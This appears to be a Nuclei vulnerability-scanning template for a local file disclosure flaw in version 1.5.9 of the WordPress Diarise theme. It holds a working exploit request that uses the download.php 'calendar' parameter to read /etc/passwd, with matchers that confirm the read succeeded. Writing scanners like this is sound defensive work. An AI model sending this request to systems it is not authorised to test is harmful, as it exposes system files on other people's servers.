id: diarise-theme-lfi
info:
  name: WordPress Diarise 1.5.9 Local File Disclosure
  author: 0x_Akoko
  severity: high
  description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability.
  reference:
    - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
    - https://cxsecurity.com/issue/WLB-2019050123
  tags: wordpress,wp-theme,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
